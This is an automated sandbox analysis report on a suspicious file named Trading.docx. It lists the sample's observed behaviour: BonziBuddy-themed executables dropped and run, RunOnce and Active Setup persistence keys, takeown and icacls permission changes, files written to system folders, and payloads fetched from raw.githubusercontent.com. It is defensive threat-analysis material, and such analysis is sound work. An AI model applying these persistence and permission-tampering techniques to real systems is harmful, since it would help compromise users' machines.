Analysis Overview
SHA256
64b11a8ac6bde59c9d0446ef7133657080e0709ccafb2583764662150cec6b7e
Threat Level: Likely malicious
The file Trading.docx was found to be: Likely malicious.
Malicious Activity Summary
Downloads MZ/PE file
Blocklisted process makes network request
Possible privilege escalation attempt
Event Triggered Execution: AppInit DLLs
Boot or Logon Autostart Execution: Active Setup
Loads dropped DLL
Executes dropped EXE
Modifies file permissions
File and Directory Permissions Modification: Windows File and Directory Permissions Modification
Legitimate hosting services abused for malware hosting/C2
Adds Run key to start application
Checks installed software on the system
Power Settings
Enumerates connected drives
Drops file in System32 directory
Drops file in Program Files directory
Drops file in Windows directory
Program crash
Access Token Manipulation: Create Process with Token
Enumerates physical storage devices
Event Triggered Execution: Accessibility Features
Uses Task Scheduler COM API
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Kills process with taskkill
Uses Volume Shadow Copy service COM API
Suspicious behavior: EnumeratesProcesses
Checks processor information in registry
NTFS ADS
Suspicious use of SendNotifyMessage
Uses Volume Shadow Copy WMI provider
Suspicious use of AdjustPrivilegeToken
Modifies registry class
Enumerates system info in registry
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of WriteProcessMemory
Suspicious behavior: AddClipboardFormatListener
Checks SCSI registry key(s)
Modifies data under HKEY_USERS
Suspicious use of FindShellTrayWindow
Suspicious use of SetWindowsHookEx
Modifies Internet Explorer settings
MITRE ATT&CK Matrix
Analysis: static1
Detonation Overview
Reported
2024-06-20 08:51
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-20 08:51
Reported
2024-06-20 09:03
Platform
win11-20240508-en
Max time kernel
350s
Max time network
705s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Boot or Logon Autostart Execution: Active Setup
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\software\WOW6432Node\microsoft\Active Setup\Installed Components | C:\Users\Admin\AppData\Local\Temp\INSTALLER.exe | N/A |
| Key created | \REGISTRY\MACHINE\software\WOW6432Node\microsoft\Active Setup\Installed Components | C:\Users\Admin\AppData\Local\Temp\INSTALLER.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\MACHINE\software\WOW6432Node\microsoft\Active Setup\Installed Components | C:\Program Files (x86)\BonziBuddy432\Runtimes\tv_enua.exe | N/A |
Downloads MZ/PE file
Event Triggered Execution: AppInit DLLs
Possible privilege escalation attempt
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Downloads\BonziKill.exe | N/A |
| N/A | N/A | C:\bonzi\BonziBuddy_original.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\BonziBuddy432.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\BonziBuddy432\Runtimes\tv_enua.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\Bonzify.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\INSTALLER.exe | N/A |
| N/A | N/A | C:\Windows\msagent\AgentSvr.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\INSTALLER.exe | N/A |
| N/A | N/A | C:\Windows\msagent\AgentSvr.exe | N/A |
Loads dropped DLL
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\tv_enua = "RunDll32 advpack.dll,LaunchINFSection C:\\Windows\\INF\\tv_enua.inf, RemoveCabinet" | C:\Program Files (x86)\BonziBuddy432\Runtimes\tv_enua.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\tv_enua = "RunDll32 advpack.dll,LaunchINFSection C:\\Windows\\INF\\tv_enua.inf, RemoveCabinet" | C:\Users\Admin\AppData\Local\Temp\INSTALLER.exe | N/A |
Checks installed software on the system
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\D: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\F: | C:\Windows\explorer.exe | N/A |
File and Directory Permissions Modification: Windows File and Directory Permissions Modification
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Power Settings
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SysWOW64\SET24B5.tmp | C:\Program Files (x86)\BonziBuddy432\Runtimes\tv_enua.exe | N/A |
| File created | C:\Windows\SysWOW64\SET24B5.tmp | C:\Program Files (x86)\BonziBuddy432\Runtimes\tv_enua.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\msvcp50.dll | C:\Program Files (x86)\BonziBuddy432\Runtimes\tv_enua.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files (x86)\BonziBuddy432\Books\Bonz and the Polizoof\page17.htm | C:\Users\Admin\Downloads\BonziBuddy432.exe | N/A |
| File opened for modification | C:\Program Files (x86)\BonziBuddy432\Books\Bonz and the Polizoof\page3.jpg | C:\Users\Admin\Downloads\BonziBuddy432.exe | N/A |
| File opened for modification | C:\Program Files (x86)\BonziBuddy432\SSCALB32.OCX | C:\Users\Admin\Downloads\BonziBuddy432.exe | N/A |
| File opened for modification | C:\Program Files (x86)\BonziBuddy432\Books\Bonzi and the Internet\page13.jpg | C:\Users\Admin\Downloads\BonziBuddy432.exe | N/A |
| File opened for modification | C:\Program Files (x86)\BonziBuddy432\BonziCheckers.ocx | C:\Users\Admin\Downloads\BonziBuddy432.exe | N/A |
| File opened for modification | C:\Program Files (x86)\BonziBuddy432\CHORD.WAV | C:\Users\Admin\Downloads\BonziBuddy432.exe | N/A |
| File opened for modification | C:\Program Files (x86)\BonziBuddy432\msvcrt.dll | C:\Users\Admin\Downloads\BonziBuddy432.exe | N/A |
| File opened for modification | C:\Program Files (x86)\BonziBuddy432\Runtimes\Readme.txt | C:\Users\Admin\Downloads\BonziBuddy432.exe | N/A |
| File opened for modification | C:\Program Files (x86)\BonziBuddy432\Options\ManualDirPatcher.vbs | C:\Users\Admin\Downloads\BonziBuddy432.exe | N/A |
| File opened for modification | C:\Program Files (x86)\BonziBuddy432\Options\menu.bat | C:\Users\Admin\Downloads\BonziBuddy432.exe | N/A |
| File opened for modification | C:\Program Files (x86)\BonziBuddy432\Books\Bonz and the Treasure Chest\page15.jpg | C:\Users\Admin\Downloads\BonziBuddy432.exe | N/A |
| File opened for modification | C:\Program Files (x86)\BonziBuddy432\Books\Bonzi and the Alpha-net\page4.jpg | C:\Users\Admin\Downloads\BonziBuddy432.exe | N/A |
| File opened for modification | C:\Program Files (x86)\BonziBuddy432\Books\Bonzi and the Internet\page1.jpg | C:\Users\Admin\Downloads\BonziBuddy432.exe | N/A |
| File opened for modification | C:\Program Files (x86)\BonziBuddy432\Uninstall.exe | C:\Users\Admin\Downloads\BonziBuddy432.exe | N/A |
| File opened for modification | C:\Program Files (x86)\BonziBuddy432\j001.nbd | C:\Users\Admin\Downloads\BonziBuddy432.exe | N/A |
| File opened for modification | C:\Program Files (x86)\BonziBuddy432\j2.nbd-SR | C:\Users\Admin\Downloads\BonziBuddy432.exe | N/A |
| File opened for modification | C:\Program Files (x86)\BonziBuddy432\t3.nbd | C:\Users\Admin\Downloads\BonziBuddy432.exe | N/A |
| File opened for modification | C:\Program Files (x86)\BonziBuddy432\Books\Bonz and the Polizoof\page10.jpg | C:\Users\Admin\Downloads\BonziBuddy432.exe | N/A |
| File opened for modification | C:\Program Files (x86)\BonziBuddy432\Books\Bonzi and the Internet\page5.jpg | C:\Users\Admin\Downloads\BonziBuddy432.exe | N/A |
| File opened for modification | C:\Program Files (x86)\BonziBuddy432\J001.nbd-SR | C:\Users\Admin\Downloads\BonziBuddy432.exe | N/A |
| File opened for modification | C:\Program Files (x86)\BonziBuddy432\Regicon.ocx | C:\Users\Admin\Downloads\BonziBuddy432.exe | N/A |
| File opened for modification | C:\Program Files (x86)\BonziBuddy432\Snd2.wav | C:\Users\Admin\Downloads\BonziBuddy432.exe | N/A |
| File opened for modification | C:\Program Files (x86)\BonziBuddy432\sstabs2.ocx | C:\Users\Admin\Downloads\BonziBuddy432.exe | N/A |
| File opened for modification | C:\Program Files (x86)\BonziBuddy432\BG\Bg1.bmp | C:\Users\Admin\Downloads\BonziBuddy432.exe | N/A |
| File opened for modification | C:\Program Files (x86)\BonziBuddy432\Options\AutoDirPatcher.bat | C:\Users\Admin\Downloads\BonziBuddy432.exe | N/A |
| File opened for modification | C:\Program Files (x86)\BonziBuddy432\Options\AutoShortcutsMaker.vbs | C:\Users\Admin\Downloads\BonziBuddy432.exe | N/A |
| File opened for modification | C:\Program Files (x86)\BonziBuddy432\MSAGENTS\Peedy.acs | C:\Users\Admin\Downloads\BonziBuddy432.exe | N/A |
| File opened for modification | C:\Program Files (x86)\BonziBuddy432\Books\Bonzi and the Alpha-net\page3.jpg | C:\Users\Admin\Downloads\BonziBuddy432.exe | N/A |
| File opened for modification | C:\Program Files (x86)\BonziBuddy432\Books\Bonzi and the Internet\page4.jpg | C:\Users\Admin\Downloads\BonziBuddy432.exe | N/A |
| File opened for modification | C:\Program Files (x86)\BonziBuddy432\Bonzi's Solitaire.exe | C:\Users\Admin\Downloads\BonziBuddy432.exe | N/A |
| File opened for modification | C:\Program Files (x86)\BonziBuddy432\Books\Bonz and the Polizoof\page17.jpg | C:\Users\Admin\Downloads\BonziBuddy432.exe | N/A |
| File opened for modification | C:\Program Files (x86)\BonziBuddy432\Books\Bonz and the Treasure Chest\page12.jpg | C:\Users\Admin\Downloads\BonziBuddy432.exe | N/A |
| File opened for modification | C:\Program Files (x86)\BonziBuddy432\Books\Bonzi and the Alpha-net\page14.jpg | C:\Users\Admin\Downloads\BonziBuddy432.exe | N/A |
| File opened for modification | C:\Program Files (x86)\BonziBuddy432\Books\Bonzi and the Internet\page11.jpg | C:\Users\Admin\Downloads\BonziBuddy432.exe | N/A |
| File opened for modification | C:\Program Files (x86)\BonziBuddy432\favicon.ico | C:\Users\Admin\Downloads\BonziBuddy432.exe | N/A |
| File opened for modification | C:\Program Files (x86)\BonziBuddy432\RACREG32.DLL | C:\Users\Admin\Downloads\BonziBuddy432.exe | N/A |
| File opened for modification | C:\Program Files (x86)\BonziBuddy432\Books\Bonz and the Treasure Chest\cb016.gif | C:\Users\Admin\Downloads\BonziBuddy432.exe | N/A |
| File opened for modification | C:\Program Files (x86)\BonziBuddy432\Books\Bonz and the Treasure Chest\page11.jpg | C:\Users\Admin\Downloads\BonziBuddy432.exe | N/A |
| File opened for modification | C:\Program Files (x86)\BonziBuddy432\Books\Bonz and the Treasure Chest\page9.jpg | C:\Users\Admin\Downloads\BonziBuddy432.exe | N/A |
| File opened for modification | C:\Program Files (x86)\BonziBuddy432\Books\Bonzi and the Alpha-net\page5.jpg | C:\Users\Admin\Downloads\BonziBuddy432.exe | N/A |
| File opened for modification | C:\Program Files (x86)\BonziBuddy432\Books\Bonzi and the Alpha-net\sp003.gif | C:\Users\Admin\Downloads\BonziBuddy432.exe | N/A |
| File opened for modification | C:\Program Files (x86)\BonziBuddy432\Books\Bonzi and the Alpha-net\sp005.gif | C:\Users\Admin\Downloads\BonziBuddy432.exe | N/A |
| File opened for modification | C:\Program Files (x86)\BonziBuddy432\BonziBDY_4.EXE | C:\Users\Admin\Downloads\BonziBuddy432.exe | N/A |
| File opened for modification | C:\Program Files (x86)\BonziBuddy432\Books\Bonz and the Polizoof\page16.jpg | C:\Users\Admin\Downloads\BonziBuddy432.exe | N/A |
| File opened for modification | C:\Program Files (x86)\BonziBuddy432\Books\Bonz and the Polizoof\page5.jpg | C:\Users\Admin\Downloads\BonziBuddy432.exe | N/A |
| File opened for modification | C:\Program Files (x86)\BonziBuddy432\Books\Bonz and the Treasure Chest\cb013.gif | C:\Users\Admin\Downloads\BonziBuddy432.exe | N/A |
| File opened for modification | C:\Program Files (x86)\BonziBuddy432\Books\Bonzi and the Alpha-net\page0.jpg | C:\Users\Admin\Downloads\BonziBuddy432.exe | N/A |
| File opened for modification | C:\Program Files (x86)\BonziBuddy432\Books\Bonzi and the Alpha-net\page6.jpg | C:\Users\Admin\Downloads\BonziBuddy432.exe | N/A |
| File opened for modification | C:\Program Files (x86)\BonziBuddy432\Books\Bonzi and the Alpha-net\page8.jpg | C:\Users\Admin\Downloads\BonziBuddy432.exe | N/A |
| File opened for modification | C:\Program Files (x86)\BonziBuddy432\Books\Bonzi and the Alpha-net\sp001.gif | C:\Users\Admin\Downloads\BonziBuddy432.exe | N/A |
| File opened for modification | C:\Program Files (x86)\BonziBuddy432\j3.nbd-SR | C:\Users\Admin\Downloads\BonziBuddy432.exe | N/A |
| File opened for modification | C:\Program Files (x86)\BonziBuddy432\P001.nbd-SR | C:\Users\Admin\Downloads\BonziBuddy432.exe | N/A |
| File opened for modification | C:\Program Files (x86)\BonziBuddy432\Books\Bonz and the Polizoof\page0.jpg | C:\Users\Admin\Downloads\BonziBuddy432.exe | N/A |
| File opened for modification | C:\Program Files (x86)\BonziBuddy432\Books\Bonz and the Polizoof\page12.jpg | C:\Users\Admin\Downloads\BonziBuddy432.exe | N/A |
| File opened for modification | C:\Program Files (x86)\BonziBuddy432\Books\Bonz and the Treasure Chest\page4.jpg | C:\Users\Admin\Downloads\BonziBuddy432.exe | N/A |
| File opened for modification | C:\Program Files (x86)\BonziBuddy432\Books\Bonzi and the Alpha-net\page7.jpg | C:\Users\Admin\Downloads\BonziBuddy432.exe | N/A |
| File opened for modification | C:\Program Files (x86)\BonziBuddy432\Books\Bonzi and the Internet\book | C:\Users\Admin\Downloads\BonziBuddy432.exe | N/A |
| File opened for modification | C:\Program Files (x86)\BonziBuddy432\Books\Bonzi and the Internet\page12.jpg | C:\Users\Admin\Downloads\BonziBuddy432.exe | N/A |
| File opened for modification | C:\Program Files (x86)\BonziBuddy432\BonziBDY_35.EXE | C:\Users\Admin\Downloads\BonziBuddy432.exe | N/A |
| File opened for modification | C:\Program Files (x86)\BonziBuddy432\p001.nbd | C:\Users\Admin\Downloads\BonziBuddy432.exe | N/A |
| File opened for modification | C:\Program Files (x86)\BonziBuddy432\BG\Bg2.bmp | C:\Users\Admin\Downloads\BonziBuddy432.exe | N/A |
| File opened for modification | C:\Program Files (x86)\BonziBuddy432\Options\fix.bat | C:\Users\Admin\Downloads\BonziBuddy432.exe | N/A |
| File opened for modification | C:\Program Files (x86)\BonziBuddy432\Books\Bonz and the Treasure Chest\page16.jpg | C:\Users\Admin\Downloads\BonziBuddy432.exe | N/A |
| File opened for modification | C:\Program Files (x86)\BonziBuddy432\Books\Bonz and the Treasure Chest\page7.jpg | C:\Users\Admin\Downloads\BonziBuddy432.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\msagent\SET2C18.tmp | C:\Users\Admin\AppData\Local\Temp\INSTALLER.exe | N/A |
| File created | C:\Windows\INF\SET2C2A.tmp | C:\Users\Admin\AppData\Local\Temp\INSTALLER.exe | N/A |
| File opened for modification | C:\Windows\msagent\chars\Bonzi.acs | C:\Users\Admin\Downloads\BonziBuddy432.exe | N/A |
| File opened for modification | C:\Windows\msagent\mslwvtts.dll | C:\Users\Admin\AppData\Local\Temp\INSTALLER.exe | N/A |
| File opened for modification | C:\Windows\msagent\SET2C4D.tmp | C:\Users\Admin\AppData\Local\Temp\INSTALLER.exe | N/A |
| File opened for modification | C:\Windows\lhsp\help\SET2E66.tmp | C:\Users\Admin\AppData\Local\Temp\INSTALLER.exe | N/A |
| File opened for modification | C:\Windows\msagent\chars\Peedy.acs | C:\Users\Admin\Downloads\BonziBuddy432.exe | N/A |
| File created | C:\Windows\lhsp\help\SET2493.tmp | C:\Program Files (x86)\BonziBuddy432\Runtimes\tv_enua.exe | N/A |
| File created | C:\Windows\msagent\SET2BF4.tmp | C:\Users\Admin\AppData\Local\Temp\INSTALLER.exe | N/A |
| File opened for modification | C:\Windows\msagent\SET2BF7.tmp | C:\Users\Admin\AppData\Local\Temp\INSTALLER.exe | N/A |
| File opened for modification | C:\Windows\lhsp\help\tv_enua.hlp | C:\Users\Admin\AppData\Local\Temp\INSTALLER.exe | N/A |
| File opened for modification | C:\Windows\Panther\UnattendGC\diagerr.xml | N/A | N/A |
| File opened for modification | C:\Windows\lhsp\tv\SET2471.tmp | C:\Program Files (x86)\BonziBuddy432\Runtimes\tv_enua.exe | N/A |
| File created | C:\Windows\fonts\SET2494.tmp | C:\Program Files (x86)\BonziBuddy432\Runtimes\tv_enua.exe | N/A |
| File created | C:\Windows\lhsp\tv\SET2E55.tmp | C:\Users\Admin\AppData\Local\Temp\INSTALLER.exe | N/A |
| File opened for modification | C:\Windows\lhsp\tv\SET2E56.tmp | C:\Users\Admin\AppData\Local\Temp\INSTALLER.exe | N/A |
| File opened for modification | C:\Windows\lhsp\help\tv_enua.hlp | C:\Program Files (x86)\BonziBuddy432\Runtimes\tv_enua.exe | N/A |
| File opened for modification | C:\Windows\msagent\SET2BF6.tmp | C:\Users\Admin\AppData\Local\Temp\INSTALLER.exe | N/A |
| File opened for modification | C:\Windows\INF\agtinst.inf | C:\Users\Admin\AppData\Local\Temp\INSTALLER.exe | N/A |
| File created | C:\Windows\msagent\intl\SET2C4C.tmp | C:\Users\Admin\AppData\Local\Temp\INSTALLER.exe | N/A |
| File created | C:\Windows\lhsp\tv\SET2471.tmp | C:\Program Files (x86)\BonziBuddy432\Runtimes\tv_enua.exe | N/A |
| File opened for modification | C:\Windows\help\SET2C3C.tmp | C:\Users\Admin\AppData\Local\Temp\INSTALLER.exe | N/A |
| File opened for modification | C:\Windows\lhsp\tv\tvenuax.dll | C:\Users\Admin\AppData\Local\Temp\INSTALLER.exe | N/A |
| File created | C:\Windows\msagent\chars\Bonzi.acs | C:\Users\Admin\Downloads\Bonzify.exe | N/A |
| File opened for modification | C:\Windows\msagent\AgtCtl15.tlb | C:\Users\Admin\AppData\Local\Temp\INSTALLER.exe | N/A |
| File opened for modification | C:\Windows\INF\SET2E68.tmp | C:\Users\Admin\AppData\Local\Temp\INSTALLER.exe | N/A |
| File opened for modification | C:\Windows\lhsp\tv\SET2492.tmp | C:\Program Files (x86)\BonziBuddy432\Runtimes\tv_enua.exe | N/A |
| File opened for modification | C:\Windows\msagent\SET2BE4.tmp | C:\Users\Admin\AppData\Local\Temp\INSTALLER.exe | N/A |
| File opened for modification | C:\Windows\msagent\AgentDp2.dll | C:\Users\Admin\AppData\Local\Temp\INSTALLER.exe | N/A |
| File created | C:\Windows\msagent\SET2BF6.tmp | C:\Users\Admin\AppData\Local\Temp\INSTALLER.exe | N/A |
| File opened for modification | C:\Windows\msagent\AgentMPx.dll | C:\Users\Admin\AppData\Local\Temp\INSTALLER.exe | N/A |
| File opened for modification | C:\Windows\msagent\SET2C17.tmp | C:\Users\Admin\AppData\Local\Temp\INSTALLER.exe | N/A |
| File created | C:\Windows\INF\SET2E68.tmp | C:\Users\Admin\AppData\Local\Temp\INSTALLER.exe | N/A |
| File opened for modification | C:\Windows\INF\tv_enua.inf | C:\Users\Admin\AppData\Local\Temp\INSTALLER.exe | N/A |
| File created | C:\Windows\lhsp\tv\SET2492.tmp | C:\Program Files (x86)\BonziBuddy432\Runtimes\tv_enua.exe | N/A |
| File created | C:\Windows\msagent\SET2C3B.tmp | C:\Users\Admin\AppData\Local\Temp\INSTALLER.exe | N/A |
| File created | C:\Windows\msagent\SET2C4D.tmp | C:\Users\Admin\AppData\Local\Temp\INSTALLER.exe | N/A |
| File opened for modification | C:\Windows\lhsp\help\SET2493.tmp | C:\Program Files (x86)\BonziBuddy432\Runtimes\tv_enua.exe | N/A |
| File opened for modification | C:\Windows\INF\SET2495.tmp | C:\Program Files (x86)\BonziBuddy432\Runtimes\tv_enua.exe | N/A |
| File created | C:\Windows\executables.bin | C:\Users\Admin\Downloads\Bonzify.exe | N/A |
| File created | C:\Windows\msagent\SET2BE4.tmp | C:\Users\Admin\AppData\Local\Temp\INSTALLER.exe | N/A |
| File opened for modification | C:\Windows\msagent\SET2BF5.tmp | C:\Users\Admin\AppData\Local\Temp\INSTALLER.exe | N/A |
| File opened for modification | C:\Windows\msagent\intl\Agt0409.dll | C:\Users\Admin\AppData\Local\Temp\INSTALLER.exe | N/A |
| File created | C:\Windows\msagent\SET2BF5.tmp | C:\Users\Admin\AppData\Local\Temp\INSTALLER.exe | N/A |
| File opened for modification | C:\Windows\msagent\AgentAnm.dll | C:\Users\Admin\AppData\Local\Temp\INSTALLER.exe | N/A |
| File opened for modification | C:\Windows\help\Agt0409.hlp | C:\Users\Admin\AppData\Local\Temp\INSTALLER.exe | N/A |
| File opened for modification | C:\Windows\fonts\SET2E67.tmp | C:\Users\Admin\AppData\Local\Temp\INSTALLER.exe | N/A |
| File opened for modification | C:\Windows\Panther\UnattendGC\setuperr.log | N/A | N/A |
| File created | C:\Windows\fonts\SET2E67.tmp | C:\Users\Admin\AppData\Local\Temp\INSTALLER.exe | N/A |
| File opened for modification | C:\Windows\fonts\andmoipa.ttf | C:\Users\Admin\AppData\Local\Temp\INSTALLER.exe | N/A |
| File opened for modification | C:\Windows\fonts\andmoipa.ttf | C:\Program Files (x86)\BonziBuddy432\Runtimes\tv_enua.exe | N/A |
| File opened for modification | C:\Windows\msagent\AgentDPv.dll | C:\Users\Admin\AppData\Local\Temp\INSTALLER.exe | N/A |
| File created | C:\Windows\msagent\SET2BF7.tmp | C:\Users\Admin\AppData\Local\Temp\INSTALLER.exe | N/A |
| File opened for modification | C:\Windows\msagent\SET2C19.tmp | C:\Users\Admin\AppData\Local\Temp\INSTALLER.exe | N/A |
| File opened for modification | C:\Windows\msagent\intl\SET2C4C.tmp | C:\Users\Admin\AppData\Local\Temp\INSTALLER.exe | N/A |
| File opened for modification | C:\Windows\lhsp\tv\tv_enua.dll | C:\Users\Admin\AppData\Local\Temp\INSTALLER.exe | N/A |
| File opened for modification | C:\Windows\Panther\UnattendGC\diagwrn.xml | N/A | N/A |
| File opened for modification | C:\Windows\msagent\AgentCtl.dll | C:\Users\Admin\AppData\Local\Temp\INSTALLER.exe | N/A |
| File opened for modification | C:\Windows\msagent\AgentSvr.exe | C:\Users\Admin\AppData\Local\Temp\INSTALLER.exe | N/A |
| File created | C:\Windows\msagent\SET2C19.tmp | C:\Users\Admin\AppData\Local\Temp\INSTALLER.exe | N/A |
| File created | C:\Windows\lhsp\help\SET2E66.tmp | C:\Users\Admin\AppData\Local\Temp\INSTALLER.exe | N/A |
| File created | C:\Windows\finalDestruction.bin | C:\Users\Admin\Downloads\Bonzify.exe | N/A |
| File opened for modification | C:\Windows\lhsp\tv\SET2E55.tmp | C:\Users\Admin\AppData\Local\Temp\INSTALLER.exe | N/A |
| File opened for modification | C:\Windows\Panther\UnattendGC\setupact.log | N/A | N/A |
Access Token Manipulation: Create Process with Token
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Enumerates physical storage devices
Event Triggered Execution: Accessibility Features
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
